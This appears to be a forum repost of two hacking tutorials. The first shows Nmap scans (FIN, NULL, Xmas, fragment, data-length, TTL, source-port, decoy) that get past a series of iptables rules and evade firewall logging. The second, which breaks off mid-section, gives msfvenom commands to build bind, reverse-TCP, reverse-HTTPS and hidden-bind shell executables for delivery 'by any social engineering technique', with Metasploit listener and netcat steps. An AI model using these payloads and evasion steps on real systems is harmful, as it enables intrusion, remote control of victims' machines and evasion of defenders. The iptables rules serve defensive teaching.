05-14-2020, 05:30 AM
| 0 | 0 | ||
Today we are going to demonstrate “Nmap firewall scan” by making use of Iptable rules and try to bypass the firewall filter to perform NMAP Advance scanning.
Let’s Begin!!
Attacker’s IP: 192.168.0.107 [kali linux]
Target’s IP: 192.168.0.101 [Ubuntu]
Analysis TCP Scan
Open the terminal in your Kali Linux and execute the following command to perform TCP[sT] scan for open port enumeration.
nmap -sT -p22 192.168.1.101
1
nmap -sT -p22 192.168.1.101
From given below image you can observe we had scanned port 22 as result it has shown Port 22 is Open for SSH service.
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-E81IAdxm9aU/Wha54OqyApI/AAAAAAAASa8/0AJo9PygfUclUYRUYWxF4q-F8bnJ5UoWACEwYBhgL/s1600/1.png?w=687&ssl=1)
When you will use Wireshark in order to capture the packet send in the case of TCP while the network is being scanning, here you need to notice few things such as “flag, Total length and time to live[TTL]” [in layer3].
Following table contains detail of Flag, Data length and TTL in different scanning method:
Scan Name
Flag
Data Length
TTL
-sT (TCP)
SYN →
← SYN, ACK
ACK →
RST, ACK →
60
64
-sS (Stealth)
SYN →
← SYN, ACK
RST
44
<64 (Less than 64)
-sF (Finish)
FIN →
40
<64 (Less than 64)
-sN (Null)
NULL →
40
<64 (Less than 64)
-sX (Xmas)
FIN, PSH, URG →
40
<64 (Less than 64)
Following image of Wireshark is showing network traffic generated while nmap TCP scan is running, here 1st stream indicates SYN packet which contains the following information:
Total Length: 60 [data length excluding 14 bytes of Ethernet]
Time to live: 64 [it is maximum TTL of the Linux system in TCP communication]
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-9IY9OyRDkHs/Wha56ocIIlI/AAAAAAAASa8/j3eKYu1r5d87c_NsddiRry3SOXUBP4BUQCEwYBhgL/s1600/2.png?w=687&ssl=1)
Reject SYN Flag with IPTables
As we know there is the strong fight between security researcher and attacker, to increase network security admin will apply firewall filter which will now prevent 3-way handshake communication in the network and resists attacker to perform TCP scan by rejecting SYN packet in the network.
Execute given below command in Ubuntu to block SYN packet:
iptables -I INPUT -p tcp --tcp-flags ALL SYN -j REJECT --reject-with tcp-reset
1
iptables -I INPUT -p tcp --tcp-flags ALL SYN -j REJECT --reject-with tcp-reset
Iptable work as the firewall in the Linux operating system and above iptable rule will reject SYN packet to prevent TCP scan.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-rg16Zjj3O70/Wha5_Oe2T7I/AAAAAAAASa8/VyutGAjPv0g0BVTvBRhyXIvLsKK_PpBAgCEwYBhgL/s1600/3.png?w=687&ssl=1){kind=small}
Now when SYN packet has been rejected by the firewall in the target network, the attacker will be unable to enumerate open port of the target’s network even if services are activated.
Now when again we [the attacker] have executed TCP scan then it found Port 22 is closed as shown in the given image.
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-q9XYgdS3mB4/Wha6DGhexRI/AAAAAAAASa8/s87BoDjhsu4QSCjRdlPlQgm911qcWCpywCEwYBhgL/s1600/4.png?w=687&ssl=1)
Bypass SYN Filter
When the attacker fails to enumerate open port using a TCP scan. Then there are some advanced scanning methods used to bypass such type of firewall filter as given below :
FIN Scan
A FIN packet is used to terminate the TCP connection between the source and destination port typically after the data transfer is complete. In the place of the SYN packet, Nmastartsrt a FIN scan by sending FIN packet.
Fin Scan only works on Linux machine and does not work on latest version of windows
nmap -sF -p22 192.168.0.101
1
nmap -sF -p22 192.168.0.101
Frothe m given image you can observe the result that port 22 is open.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-XD_23w3JvBw/Wha6DSXsgkI/AAAAAAAASa8/YgRTepSBGX0AiyXBFZGQ9F0mXhf6O_t7wCEwYBhgL/s1600/5.png?w=687&ssl=1)
When you will capture network traffic for FIN packet, you can bear out “data length” is 40 and “TTL” will be less than 64 every time moreover there is no use of SYN packet to establish TCP communication with target machine.
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-yY_j9T8AJqo/Wha6D5PwZ-I/AAAAAAAASa8/D60Cx8Ml56MiolLa2sQu0FH-wKcNthf4QCEwYBhgL/s1600/6.png?w=687&ssl=1)
NULL Scan
A Null Scan is a series of TCP packets which hold a sequence number of “zeros” (0000000) and since there are none flags set, the destination will not know how to reply the request. It will discard the packet and no reply will be sent, which indicate that the t port is open.
Null Scan are only workable in Linux machines and does not work on the latest version of windows
nmap -sN -p22 192.168.0.101
1
nmap -sN -p22 192.168.0.101
For the m given image you can observe the result that port 22 is open.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-dIw-6JmpKmw/Wha6EUR2DHI/AAAAAAAASa8/wWaZ1ZvvQWYGMqqOj1ZFlIBSZ_f1oMXuwCEwYBhgL/s1600/7.png?w=687&ssl=1)
Similar,ly When you will capture network traffic for the NULL packet, you can bear out “data length” is 40 and “TTL” will be less than 64 every time, here also there is no use of SYN packet to establish TCP communication with target machine.
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-x_PMTNfW7Fc/Wha6EmlCk7I/AAAAAAAASa8/gKe566RBAN0ge50WiTIkTAOTmai6qTDGgCEwYBhgL/s1600/8.png?w=687&ssl=1)
XMAS Scan
These scans are designed to manipulate the PSH, URG and FIN flags of the TCP header, Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree. When source sent FIN, PUSH, and URG packet to a specific port and if a port is open then destination will discard the packets and will not sent any reply to a source.
Xmas Scan are only workable in Linux machines and does not work on the latest version of windows
nmap -sX -p22 192.168.0.101
1
nmap -sX -p22 192.168.0.101
From the given image you can observe the result that port 22 is open.
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-nu9aTGOHOLM/Wha6E_UklJI/AAAAAAAASa8/TxOtab2FXo8FiKISxYF6q37xY4tPnXmgwCEwYBhgL/s1600/9.png?w=687&ssl=1)
Similarly, When you will capture network traffic for xmas scan you will get the combination of FIN, PSH and URG flags, here also you can bear out “data length” is 40 and “TTL” will be less than 64 every time.
Conclusion: TCP connection established by 3 way handshake and if firewall discard 3 way handshake to prevent TCP communication then FIN, NULL and XMAS scan are used for TCP connection.
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-m4bFa9s2e7s/Wha54UOwgvI/AAAAAAAASa8/FmYJbr6sBLIoz8raUIBWMapUIpuuzivVwCEwYBhgL/s1600/10.png?w=687&ssl=1)
Reject FIN Packet Using IPTABLES Rule
Again admin add a new firewall filter to Prevent Network enumeration from Fin scan which will reject FIN packet in the network.
Execute given below command in Ubuntu to block FIN packet:
iptables -I INPUT -p tcp --tcp-flags ALL FIN -j REJECT --reject-with tcp-reset
1
iptables -I INPUT -p tcp --tcp-flags ALL FIN -j REJECT --reject-with tcp-reset
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-4-_X3lbn1Gk/Wha53zoIOaI/AAAAAAAASa8/DYI97y8Wmg8Inrm6CDUHIuIdsFBNWZLxACEwYBhgL/s1600/11.png?w=687&ssl=1){kind=small}
Now when the attacker will try to perform advance scan through FIN scan then he will not able to enumerate open port information which you can confirm from given below image.
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-pDYsMp6FSe0/Wha5460kEII/AAAAAAAASa8/LtELXNdMQZw3eqZYqDX7-sMOYt_3gNcXgCEwYBhgL/s1600/12.png?w=687&ssl=1)
At present only Null and Xmas will helpful to perform port enumeration until unless admin has not block traffic coming from these scan. From given below image you can confirm that port 22 is close when Fin scan is performed while open when Null and Xmas is performed.
To prevent you network from NULL and Xmas scan too, apply given below iptables rule for Null and Xmas respectively:
iptables -I INPUT -p tcp --tcp-flags ALL NONE -j REJECT --reject-with tcp-reset
iptables -I INPUT -p tcp --tcp-flags ALL FIN,PSH,URG -j REJECT --reject-with tcp-reset
1
2
iptables -I INPUT -p tcp --tcp-flags ALL NONE -j REJECT --reject-with tcp-reset
iptables -I INPUT -p tcp --tcp-flags ALL FIN,PSH,URG -j REJECT --reject-with tcp-reset
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-I01iCM3VYIU/Wha55bzp7vI/AAAAAAAASa8/EDB-TCkQoCYt4hgO_lQ9kA7YscS2tK0igCEwYBhgL/s1600/13.png?w=687&ssl=1)
Reject Data-length with IPTables
As I had discussed above TCP communication based upon 3 factors i.e. “Flag” which I had demonstrated above, “TTL” which I will demonstrate later and “Data length” which I am going to demonstrate.
So now when admin wants secure again his network from TCP scan, instead of applying firewall filter on TCP-flags he can also apply firewall rule to check “data length” of a specific size and then stop the incoming network traffic for TCP connection. Execute given below command to apply firewall rule on “data length”; by default 60 is data length use for TCP scan which you can confirm from the table given above.
iptables -I INPUT -p tcp -m length --length 60 -j REJECT --reject-with tcp-reset
1
iptables -I INPUT -p tcp -m length --length 60 -j REJECT --reject-with tcp-reset
![[Image: 17.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-83ce_p-qjnA/Wha55cKARpI/AAAAAAAASa8/3o7CX3lzp2QUG7GrqUEH3cMdEqF_jeH5wCEwYBhgL/s1600/17.png?w=687&ssl=1){kind=small}
Now when the data length of 60 bytes has been block by the firewall in target network then the attacker will be unable to enumerate open port of target even if service is activated.
Now when again we [the attacker] had executed TCP scan then it has found Port 22 is closed as shown in the given image.
![[Image: 18.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-ZtyrVcfIbwY/Wha56E8OxhI/AAAAAAAASa8/5LWDsQioY3w1ikJvNaoXcey8eSmGtOhYQCEwYBhgL/s1600/18.png?w=687&ssl=1)
Bypass Data-Length Restriction with Stealth Scan
When attacker fail to enumerate open port using TCP [sT] scan then there are some scanning method used to bypass such type of firewall filter as given below:
nmap -sS -p 22 192.168.0.101
1
nmap -sS -p 22 192.168.0.101
From given below image you can observe port 22 is open when stealth scan[sS] is executed, this is because the data length send by stealth scan is 44 by default for TCP connection.
![[Image: 19.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-YEK0SPZdAp4/Wha56GgeetI/AAAAAAAASa8/TZxGRmtjmvkNU3xCY6qGK0lh5xGhGqEZQCEwYBhgL/s1600/19.png?w=687&ssl=1)
Stealth scan is much similar to TCP scan and also known as “half open” scanning because it send SYN packet and as response receives SYN/ACK packet from listening port and dump result without sending an ACK packet to listening port. Therefore if “SYN packet” is block by firewall this scan gets failed, this scan is only applicable in case of data length = 60 is block or TTL = 64 is block by the firewall.
![[Image: 20.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-1lr6rCHCqFg/Wha56-ZSgfI/AAAAAAAASa8/758FCla4DYAL3csxVKmR-VaMLbJwPdFLACEwYBhgL/s1600/20.png?w=687&ssl=1)
Fragment Scan
The -f option causes the requested scan to use tiny fragmented IP packets. The idea is to split up the TCP header over several packets to make it harder for packet filters, intrusion detection systems, and other annoyances to detect what you are doing. So a 20-byte TCP header would be split into three packets, two with eight bytes of the TCP header, and one with the final four.
nmap -f -p22 192.168.0.101
1
nmap -f -p22 192.168.0.101
![[Image: 21.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-yEfsZf9uUrs/Wha57HBo_TI/AAAAAAAASa8/WVGD6zpxyS01L6CO3rkQIr7Wczoxodm4gCEwYBhgL/s1600/21.png?w=687&ssl=1)
When you will capture network traffic, you can bear out “data length” is 28 excluding 14 bytes of Ethernet and “TTL” will be less than 64 every time.
Similarly, you use Fin, Null and Xmas scan whose data length is 40 to enumerate open port of target network.
![[Image: 22.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-NEjZ-jEHi8Q/Wha57_fu5aI/AAAAAAAASa8/UF7MLKBwMJwVnBwApC5WWKJScQEaEO8sQCEwYBhgL/s1600/22.png?w=687&ssl=1)
If admin will apply firewall filter to reject data length 40,44 and 60 then it will not allow the attacker to perform above all scan either basic scan or advance scan by executing following iptables rules.
iptables -I INPUT -p tcp -m length --length 60 -j REJECT --reject-with tcp-reset
iptables -I INPUT -p tcp -m length --length 44 -j REJECT --reject-with tcp-reset
iptables -I INPUT -p tcp -m length --length 40 -j REJECT --reject-with tcp-reset
1
2
3
iptables -I INPUT -p tcp -m length --length 60 -j REJECT --reject-with tcp-reset
iptables -I INPUT -p tcp -m length --length 44 -j REJECT --reject-with tcp-reset
iptables -I INPUT -p tcp -m length --length 40 -j REJECT --reject-with tcp-reset
![[Image: 23.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-ZwfRlxe-TA4/Wha58MXcuCI/AAAAAAAASa8/b2g6BVDDlOAUM0tKV_8l4Z1mVcmrDKQYwCEwYBhgL/s1600/23.png?w=687&ssl=1)
From given below image you can observe now Fin, null, Xmas and stealth scan are some examples which were unable to enumerate open port of target network. All are showing port is close even if service is activated.
![[Image: 24.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-35-hgekt0HM/Wha5784_G0I/AAAAAAAASa8/ffHNAq479z0NSaavN6c_hqdI8Uw7PWSEwCEwYBhgL/s1600/24.png?w=687&ssl=1)
Data Length Scan
When an attacker is unable to enumerate open port by applying the above scan then he should go with nmap “data-length scan” which will bypass above firewall filter too.
By default nmap scan has fix data length as explain above, this scan let you append the random data length of your choice.
Using the following command attacker is trying to enumerate open port by defining data length 12
nmap --data-length 12 -p 22 192.168.0.101
1
nmap --data-length 12 -p 22 192.168.0.101
Awesome!! From given below image you can observe port 22 is open.
![[Image: 25.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-ncN3Xu3sd1w/Wha59A6lg1I/AAAAAAAASa8/i9AaX2Rgwl4l40GLZ-T0vdKGyk6K0BEwwCEwYBhgL/s1600/25.png?w=687&ssl=1)
So when you will use wireshark to capture network traffic generated while this scan has been executed you will get “Total length” for TCP is 44.
Size of SSH packet is 70 bytes; now reduce 14 bytes from its of Ethernet then remains 56 byte; now reduce 12 bytes of data length which you have define at last total length will 44 bytes left.
Here, 70 bytes -14 bytes[Ethernet] = 56 bytes
Now, 56 bytes -12 bytes[data-length] = 44 bytes
![[Image: nmap.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-kYV3Zeb5Gig/Wl2lWwnc_KI/AAAAAAAATRo/UsSdTHtqODcopsgK_rpJSqD0a0yuk5YWACLcBGAs/s1600/nmap.png?w=687&ssl=1)
Reject Length size 1 to 100
If an admin is aware from nmap data-length scan then he should block a complete range of data length to prevent network scanning from the attacker by executing following iptable rule.
iptables -I INPUT -p tcp -m length --length 1:100 -j REJECT --reject-with tcp-reset
1
iptables -I INPUT -p tcp -m length --length 1:100 -j REJECT --reject-with tcp-reset
Now firewall will analysis traffic coming on its network then reject the packet which contains data-length from 1 byte to 100 bytes and deny to establish TCP connections with the attacker.
![[Image: 27.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-2cZ9EBG6-Jc/Wha59icsWGI/AAAAAAAASa8/s75grKtAHQAGceaH9txhwD4C3X38dwGZwCEwYBhgL/s1600/27.png?w=687&ssl=1){kind=small}
Now if the attacker sends data-length between 1 byte to 100 bytes the port scanning gets failed to enumerate its open state which you can confirm from given below image when data length 12 bytes and 10 bytes is sent in both scan, port 22 is closed. As soon as the attacker sent data-length of 101 bytes which is more than 100 bytes, port 22 gets open.
![[Image: 28.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-uKGc43fSJP0/Wha5-a8RW3I/AAAAAAAASa8/QPwqLsXgWaUZhM5cUUImilSxNcVrGTr2wCEwYBhgL/s1600/28.png?w=687&ssl=1)
TTL Scan
Reject TTL size with IPTables
After applying firewall filter on “TCP flags” and “data length” to secure network from enumeration now add firewall filter for “Time To Live” i.e. TTL.
If you had notice the table given in the beginning of the article you will observe that only TCP Scan [sT] has TTL value equal to 64 else remaining scan has TTL value less than 64 every time, hence if admin applies firewall filter to reject TTL value 64 then it will prevent network from TCP scanning.
Given below command will add a new firewall rule to check the TTL value of 64 and reject the packet.
iptables -I INPUT -p tcp -m ttl --ttl 64 -j REJECT --reject-with tcp-reset
1
iptables -I INPUT -p tcp -m ttl --ttl 64 -j REJECT --reject-with tcp-reset
![[Image: 29.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-oRyLI5J8ZZ4/Wha5-2n4ebI/AAAAAAAASa8/nrVXpPPMRpMVBdby299WVkclPxxCtMGGACEwYBhgL/s1600/29.png?w=687&ssl=1){kind=small}
Now if attacker use “TCP [sT] scan” to enumerate port information, it will always show “port is closed”, else if other scan is performed the attacker will get accurate information related to the port state. From given below image you can observe when “basic scan is execute” to enumerate port details it give “port 22 is open”.
![[Image: 30.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-EBpj_hS7Dw0/Wha5_f66phI/AAAAAAAASa8/Hurdu6eOREcxFQlEaaJDW7FAcFtNrdHuACEwYBhgL/s1600/30.png?w=687&ssl=1)
This happen because the TTL value for “basic scan” is less than 64 and the firewall of the target machine will reject only TTL value equal to 64. When we had captured network traffic generated while this scan has been executed then we found TTL value is 56 used in the basic scan.
![[Image: 31.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-fgyyXJTTOXk/Wha5_w46qyI/AAAAAAAASa8/IAOlr1M-ML4DhvqUMT1qdERRaYB5V_jaACEwYBhgL/s1600/31.png?w=687&ssl=1)
Now admin has added one more step of security to prevent his network from entire type scanning by rejecting TTL value of 64 and less than 64.
iptables -I INPUT -p tcp -m ttl --ttl-lt 64 -j REJECT --reject-with tcp-reset
1
iptables -I INPUT -p tcp -m ttl --ttl-lt 64 -j REJECT --reject-with tcp-reset
Now firewall will analysis the traffic coming on his network and blocks the packet contains TTL 64 or less than it.
![[Image: 32.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-1ySNK9ZPnYU/Wha6AKLWeAI/AAAAAAAASa8/tEsVIlqeeCgzu5TwXuSLORTsW-XKh7xIgCEwYBhgL/s1600/32.png?w=687&ssl=1){kind=small}
Bravo!! Above firewall rule is more powerful than the previous rules because it has complete block NMAP “basic scan” as well as “advance scan”, if you notice given below image then you will observe that TCP [sT], Fin Scan [sF], Data-length, Stealth [sS] Scan all have been failed and showing port is closed.
![[Image: 33.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-gfzkIWyUwhE/Wha6AkP1iaI/AAAAAAAASa8/9yIEkmV_U_EhT74aQkLuc0yKdICCkfcHgCEwYBhgL/s1600/33.png?w=687&ssl=1)
Still, there is a second way to enumerate port for an accurate result, by setting TTL value greater than 64. Following command will perform a port scan with defined TTL value i.e. 65 which will bypass firewall filter as 65 is greater than 64.
nmap -p22 --ttl 65 192.168.0.101
1
nmap -p22 --ttl 65 192.168.0.101
So if the attacker is lucky to guess rejected TTL value or firewall rule and applied correct TTL, then only port enumeration will get successful as shown in given image port 22 is open.
![[Image: 34.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-Aqc7J34MSeU/Wha6A1zBDHI/AAAAAAAASa8/GB8zmGc4r_8NLloURW7pIDeX4tEmIHcYgCEwYBhgL/s1600/34.png?w=687&ssl=1)
Source Port Scan
Source Port Filter with IPTables
One more step to secure network from scanning is to apply firewall rule to allow traffic from a specific port only and reject traffic from remaining ports.
iptables -I INPUT -p tcp --sport 80 -j ACCEPT
iptables -A INPUT -p tcp -j REJECT --reject-with tcp-reset
1
2
iptables -I INPUT -p tcp --sport 80 -j ACCEPT
iptables -A INPUT -p tcp -j REJECT --reject-with tcp-reset
![[Image: 35.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-r1Uk_-teRoI/Wha6BKnDqYI/AAAAAAAASa8/nJGXEKJe0VgYXTJizviXM-Byaxy4MVYXwCEwYBhgL/s1600/35.png?w=687&ssl=1){kind=small}
Now again NMAP basic and advance will fail to enumerate open port state and if the attacker made a correct guess again firewall filter then he can execute NMAP source port scan to enumerate port details.
The option g is used to define source port which will carry network packet to the destination port.
nmap -g 80 192.168.0.101
1
nmap -g 80 192.168.0.101
Above command will send traffic from port 80 to perform scanning hence firewall will allow traffic from source port 80 and as a result show state for open ports.
![[Image: 36.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-4b-OfsArGh0/Wha6BkTHE4I/AAAAAAAASa8/SQYRwE10TqEsUkE4oinAvbWdhv-RpAc1QCEwYBhgL/s1600/36.png?w=687&ssl=1)
Decoy Scan
Set Firewall Log to capture Attacker IP
Admin can set a firewall rule to create Log for IP from which traffic is coming, it will only create system logs to capture the attacker IP who is performing scanning.
iptables -I INPUT -p tcp -j LOG --log-prefix "kaliNmap" --log-level=4
1
iptables -I INPUT -p tcp -j LOG --log-prefix "kaliNmap" --log-level=4
Now if the attacker will perform any type of network scanning on the targeted system then the firewall will generate its log which will capture his IP.
![[Image: 37.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-pEIxt6bCP7I/Wha6BzmQueI/AAAAAAAASa8/aWJMAkgzQsIM3MXuNHaykIWadNQsLduHgCEwYBhgL/s1600/37.png?w=687&ssl=1){kind=small}
Escape from the Firewall log
Always use some kind of precaution to escape yourself while performing network scanning because in windows “honey pot” and in Linux “iptables” are firewall will make the log of attacker’s IP. In such a situation, you are suggested to use a Decoy Scan for port enumeration.
Decoy Scan
The -D option makes it look like the trick scanning the target network. It does not hide your own IP, but it makes your IP one of a torrent of others supposedly scanning the victim at the same time. This not only makes the scan look scarier, but reduces the chance of you being trace from your scan (difficult to tell which system is the “real” source).
nmap -D 216.58.203.164 192.168.0.101
1
nmap -D 216.58.203.164 192.168.0.101
In the above command, we had to use Google IP as a torrent which will reflect as attacker IP in firewall log.
![[Image: 38.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-N1bK5Cr8by4/Wha6CbDgIhI/AAAAAAAASa8/4JbK5I-VadQ4pdoY2R0WGrXd813MFMdjwCEwYBhgL/s1600/38.png?w=687&ssl=1)
tail -f /var/log/syslog
1
tail -f /var/log/syslog
When admin will read the system log then he will take higlighted IP as the attacker’s IP and may apply the filter on this IP to block incoming traffic from it.
![[Image: 39.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-xkPYEOwr5eE/Wha6C18nXmI/AAAAAAAASa8/FCyPk4ynYDIbekHC_fDrM2GMv1hCNaYiQCEwYBhgL/s1600/39.png?w=687&ssl=1)
Hello friends!!
Today we will learn to create payloads from a popular tool known as Metasploit, we will explore various option available within the tool to create payloads with different extensions and techniques.
Msfvenom
Msfvenom is a command line instance of Metasploit that is used to generate and output all of the various types of shell code that are available in Metasploit.
Requirements:
- Kali Linux
- Windows Machine
- Android Phone
- Linux Machine
Lhost= (IP of Kali)
Lport= (any port you wish to assign to the listener)
P= (Payload I.e. Windows, Android, PHP etc.)
F= file extension (i.e. windows=exe, android=apk etc.)
Let’s Begin!!
From the Kali terminal type command msfvenom as shown below. It will show you all available options for creating a payload but in this article, we are talking about different types of payload we can generate.
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-9Wj397ttpG4/Wg60O0CnnYI/AAAAAAAASXE/b2MLWqX04kwAfMj0RRBGBF9lbGEQrxuJQCEwYBhgL/s1600/1.png?w=687&ssl=1)
Bind shell
A bind shell is a kind that opens up a new service on the target machine and requires the attacker to connect to it in order to get a session
Now type the below “command” on your kali terminal
msfvenom -p windows/meterpreter/bind_tcp -f exe > /root/Desktop/bind.exe
1
msfvenom -p windows/meterpreter/bind_tcp -f exe > /root/Desktop/bind.exe
It will save the “exe” payload file on your desktop as specified on the command /root/Desktop/bind.exe We need to send this file to the victim machine through file share or by any social engineering technique and have it run on the system
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-lWC9-Mkz0D4/Wg60RqgSShI/AAAAAAAASXk/6uf60fnEyBICan6NSCFuMX_EuSQc4IzBwCEwYBhgL/s1600/2.png?w=687&ssl=1)
Now let us start msfconsole and type below command to get a session of the victim machine
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/bind_tcp
msf exploit(handler) > set rhost 192.168.0.100
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
1
2
3
4
5
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/bind_tcp
msf exploit(handler) > set rhost 192.168.0.100
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
Once the file is executed on the machine we will get the victim machine meterpreter session as shown below:
The bind_tcp option is helpful in case we get disconnected from victim machine while it is still running, we can execute the same command and get back the session without any intervention of the victim to run the exploit again.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-nBWXlnHU1ig/Wg60VTEOFVI/AAAAAAAASYg/frQ2uLGmoa8xP8wosqHhfJg3XKibtc6yQCEwYBhgL/s1600/3.png?w=687&ssl=1)
Reverse TCP Payload
A reverse shell (also known as a connect-back) is the exact opposite: it requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally the attacker receives the shell.
From the Kali terminal type command msfvenom as shown below:
Now type command
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=5555 -f exe > / root/Desktop/reverse_tcp.exe
1
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=5555 -f exe > / root/Desktop/reverse_tcp.exe
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-mZSZxayNzoM/Wg60Vc3XDhI/AAAAAAAASYg/XmNxbw0wY7sYXCb4XTZx9HE0J8gNBfJDwCEwYBhgL/s1600/4.png?w=687&ssl=1)
In this case, we will include few other options such as lhost (localhost) and lport (local port) to get a reverse connection from the victim machine
Once the payload is generated and send to the victim for execution, we will start our next step as shown below
Now let us start msfconsole and type below command to get a session of the victim machine
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport 5555
msf exploit(handler) > exploit
1
2
3
4
5
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport 5555
msf exploit(handler) > exploit
We can confirm from the image below, once the payload is executed by the victim, we received a reverse connection and got the meterpreter session successfully.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-cGrzdNMyCEU/Wg60WLGj3KI/AAAAAAAASYg/DaVjXTWdF5oV43L4B_8cD6ecxNLyGCq1wCEwYBhgL/s1600/5.png?w=687&ssl=1)
HTTPS Payload
Note: Both the above payloads can be used in case we have relevant ports active on the victim machine, so the question arises what if the victim has blocked all the ports?
Well in such cases we can create payloads as per the ports running on victim machine such as 443 for https:
Let’s us use this case and create a payload with https From the Kali terminal type command msfvenom as shown below:
Now type command
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.0.107 lport=443 -f exe > /root/Desktop/443.exe
1
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.0.107 lport=443 -f exe > /root/Desktop/443.exe
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-cp3Yk8ZVmgs/Wg60WB7jxiI/AAAAAAAASYg/UYxXmjNMFGAJISt68rJR4BxWEIQOW_r2wCEwYBhgL/s1600/6.png?w=687&ssl=1)
Once the payload is generated and send to the victim for execution, we will start our next step as shown below
Now let us start msfconsole and type below command to get a session of the victim machine
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport 443
msf exploit(handler) > exploit
1
2
3
4
5
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport 443
msf exploit(handler) > exploit
We can confirm from the above image, once the payload is executed by the victim, we received a reverse connection and got the meterpreter session.
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-MuMddQOE-Wo/Wg60Wt6hEtI/AAAAAAAASYg/XWDmyOU2dpgAIFC3dLD-ChflktTvhUxZACEwYBhgL/s1600/7.png?w=687&ssl=1)
Hidden Bind TCP Payload
Let us now explore some other technique available in msfvenom Tool and try to exploit the victim machine, this time we will get the shell of the victim machine instead of meterpreter session
Let’s begin!!
This payload hides on the background silently, while executed and does not reveal its presence if scanned by any port scanner.
From the Kali terminal type command msfvenom as shown below:
msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=1010 -f exe > /root/Desktop/hidden.exe
1
msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=1010 -f exe > /root/Desktop/hidden.exe
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-OrVwtZ2VEM0/Wg60WzdTfRI/AAAAAAAASYg/Mqd56OGOpuwXytmjwrJQKWIz15LrYRBKgCEwYBhgL/s1600/8.png?w=687&ssl=1)
Once the payload is generated and send to the victim for execution, we will start our next step as shown below.
We use Netcat to set up our listener.
Now from the kali Terminal let us type the command as shown above
nc 192.168.0.100 1010
1
nc 192.168.0.100 1010
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-1bVcHH8R__k/Wg60XBpbx3I/AAAAAAAASYg/_hGqtyqtexwVJxH-mlhSWxbInlceDdz3wCEwYBhgL/s1600/9.png?w=687&ssl=1)
Reverse Shell Payload with Netcat
Let us now do the same process and use shell_reverse_tcp payload, one more technique to get shell session of the victim
From the Kali terminal type command msfvenom as shown below:
